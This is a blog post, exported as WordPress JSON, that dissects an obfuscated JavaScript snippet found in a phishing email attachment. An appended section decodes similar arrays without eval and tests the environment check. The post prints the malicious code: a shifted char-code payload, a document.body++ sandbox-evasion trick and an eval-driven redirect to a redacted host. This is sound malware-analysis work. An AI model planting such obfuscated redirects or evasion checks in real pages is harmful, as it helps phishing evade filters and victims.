{"id":754,"date":"2013-04-11T16:12:50","date_gmt":"2013-04-11T21:12:50","guid":{"rendered":"http:\/\/trillworks.com\/nick\/?p=754"},"modified":"2013-07-29T22:20:20","modified_gmt":"2013-07-30T03:20:20","slug":"malicious-javascript-snippet","status":"publish","type":"post","link":"https:\/\/trillworks.com\/nick\/2013\/04\/11\/malicious-javascript-snippet\/","title":{"rendered":"Malicious JavaScript snippet"},"content":{"rendered":"<p>I got this snippet in an HTML file attached to a phishing email.<\/p>\n<pre class=\"brush:js\">d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc...];for(i=0;i&lt;a.length;i++){a[i]-=2;}\r\ntry{d.body++}catch(q){zz=0;}try{zz&amp;=2}catch(q){zz=1;}\r\nif(!zz)eval(String.fromCharCode.apply(String,a));<\/pre>\n<p>I&#8217;ve reformatted and annotated it for readability.<\/p>\n<pre class=\"brush:js\">\/\/ hide the redirect as an array of ASCII codes, each shifted up by 2\r\na = [0x78,0x63,0x74,0x33, etc...];\r\n\r\n\/\/ \"decrypt\" the payload by subtracting 2 from every code\r\n\/\/ (a fixed shift, not real encryption)\r\n\/\/ maybe this is good enough to defeat filters looking for encoded redirects?\r\nfor (i = 0; i &lt; a.length; i++) {\r\n    a[i] -= 2;\r\n}\r\n\r\n\/\/ detect whether we're in a real browser rather than an analysis sandbox\r\ntry {\r\n    \/\/ throws in a real browser: ++ coerces the body element to NaN and the\r\n    \/\/ document.body setter rejects a non-element value with a TypeError;\r\n    \/\/ a plain object standing in for document just ends up holding NaN\r\n    document.body++\r\n} catch(e) {\r\n    \/\/ running in a real browser\r\n    notInBrowser = 0;\r\n}\r\n\r\ntry {\r\n    \/\/ if the first try didn't throw, notInBrowser was never assigned, so the\r\n    \/\/ identifier doesn't exist and reading it here throws a ReferenceError\r\n    notInBrowser &amp;= 2\r\n}\r\ncatch(e) {\r\n    notInBrowser = 1;\r\n}\r\n\/\/ if we are in a browser, do the redirect\r\n\/\/ remember 0 == false and 1 == true\r\nif (!notInBrowser) {\r\n    eval(String.fromCharCode.apply(String,a));\r\n}<\/pre>\n<p>The decrypted code fed to the eval:<\/p>\n<pre class=\"brush:js\">var1=49;\r\nvar2=var1;\r\nif(var1==var2) {document.location=\"http:\/\/[redacted]:8080\/forum\/links\/column.php\";}<\/pre>\n<p>I&#8217;m not sure what was at the URL. It was probably a phishing page or a browser exploit. If anyone can explain why they used a second try-catch instead of an if-statement, let me know.<\/p>\n<p>This guy has a similar post that explains the <code>document.body++<\/code>.<br \/>\n<a href=\"http:\/\/jeffreysambells.com\/2012\/12\/12\/anatomy-of-a-hack\">http:\/\/jeffreysambells.com\/2012\/12\/12\/anatomy-of-a-hack<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>I got this snippet in an HTML file attached to a phishing email. d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc&#8230;];for(i=0;i&lt;a.length;i++){a[i]-=2;} try{d.body++}catch(q){zz=0;}try{zz&amp;=2}catch(q){zz=1;} if(!zz)eval(String.fromCharCode.apply(String,a)); I&#8217;ve reformatted and annotated it for readability. \/\/ hide the redirect as an array of ASCII codes, each shifted up by 2 a = [0x78,0x63,0x74,0x33, etc&#8230;]; \/\/ &#8220;decrypt&#8221; the payload by subtracting 2 from every code \/\/ (a fixed shift, not real encryption) \/\/ maybe this is good enough to defeat filters looking for encoded redirects? for (i = &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/trillworks.com\/nick\/2013\/04\/11\/malicious-javascript-snippet\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Malicious JavaScript 
snippet&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[77],"tags":[],"class_list":["post-754","post","type-post","status-publish","format-standard","hentry","category-technical"],"_links":{"self":[{"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/posts\/754","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/comments?post=754"}],"version-history":[{"count":29,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/posts\/754\/revisions"}],"predecessor-version":[{"id":943,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/posts\/754\/revisions\/943"}],"wp:attachment":[{"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/media?parent=754"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/categories?post=754"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/tags?post=754"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
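The two tricks the post dissects, the "subtract 2" char-code array and the `document.body++` sandbox check, as an added example that is not code from the original post or its author. It decodes such an array offline without ever calling `eval`, pulls any redirect target out of the decoded text as an indicator, and re-implements the browser check with the `document` object injected so both branches can be exercised from Node. The payload `SAMPLE_PLAINTEXT`, the host `example.invalid`, the DOM stub `makeBrowserLikeDocument` and the helper names are all constructed for this example; the post's real byte array is elided, so only its first four bytes (which decode to `var1`) are reused. The original relies on `zz` being an undeclared identifier; `looksLikeRealBrowser` models that state with an explicit `undefined` check instead, because a declared-but-unassigned variable would not throw.

```javascript
// Added example, not code from the original post: eval-free decoding of a
// shifted char-code array plus a re-implementation of the document.body++
// environment check. Sample payload and host name are constructed.

const SHIFT = 2;

// What the attacker did: move every char code up by SHIFT.
function encodeShifted(text, shift = SHIFT) {
  return Array.from(text, (ch) => ch.charCodeAt(0) + shift);
}

// What the snippet's for-loop plus String.fromCharCode.apply does, as a pure
// function: undo the shift and build a string. Nothing is executed.
function decodeShifted(codes, shift = SHIFT) {
  return String.fromCharCode(...codes.map((c) => c - shift));
}

// Pull redirect targets out of the decoded text so the analyst gets the
// indicator without running the script (covers document/window.location[.href]).
function extractRedirectTargets(decoded) {
  const re = /(?:document|window)\.location(?:\.href)?\s*=\s*(["'])(.*?)\1/g;
  const targets = [];
  let m;
  while ((m = re.exec(decoded)) !== null) {
    targets.push(m[2]);
  }
  return targets;
}

// The malware's environment check with `doc` injected. In the original, `zz`
// only comes into existence if the first catch runs; `zz &= 2` on a
// non-existent identifier throws a ReferenceError, which the second try/catch
// turns into "not a browser". That state is modelled here as `undefined`.
function looksLikeRealBrowser(doc) {
  let notInBrowser;
  try {
    doc.body++; // real DOM: body element -> NaN, setter rejects it and throws
  } catch (e) {
    notInBrowser = 0;
  }
  if (notInBrowser === undefined) {
    notInBrowser = 1; // first try did not throw: a fake or absent DOM
  }
  return !notInBrowser;
}

// Constructed stand-in for a browser document: the body setter enforces the
// element type the way the DOM does, so `++` throws a TypeError.
function makeBrowserLikeDocument() {
  let body = { nodeName: 'BODY' };
  return {
    get body() {
      return body;
    },
    set body(value) {
      if (value === null || typeof value !== 'object') {
        throw new TypeError("Failed to set the 'body' property on 'Document'");
      }
      body = value;
    },
  };
}

// Constructed sample: a harmless redirect encoded the same way as the sample.
const SAMPLE_PLAINTEXT = 'document.location="http://example.invalid/landing.php";';
const SAMPLE_CODES = encodeShifted(SAMPLE_PLAINTEXT);

// Decode and extract indicators in one step.
function analyze(codes) {
  const decoded = decodeShifted(codes);
  return { decoded, targets: extractRedirectTargets(decoded) };
}

console.log(analyze(SAMPLE_CODES));
console.log('browser-like document passes the check:', looksLikeRealBrowser(makeBrowserLikeDocument()));
console.log('plain-object stub passes the check:', looksLikeRealBrowser({ body: {} }));
```

The practical point for analysis is the second pair of calls: a sandbox that stubs `document` with a plain object (`{ body: {} }`) never throws on `document.body++`, so the payload is skipped and the redirect is never observed. Either decode statically, as `analyze` does, or give the stub setters that reject non-element values the way a real DOM does.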